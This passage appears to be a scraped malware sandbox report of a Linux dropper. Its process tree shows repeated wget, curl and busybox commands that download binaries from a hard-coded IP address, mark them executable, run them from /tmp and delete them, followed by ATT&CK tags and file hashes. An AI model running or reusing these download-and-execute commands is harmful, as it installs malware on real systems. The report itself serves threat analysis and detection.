/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1648
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1654
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1660
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1666
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1669
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1670
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1672
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1675
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1678
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1681
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97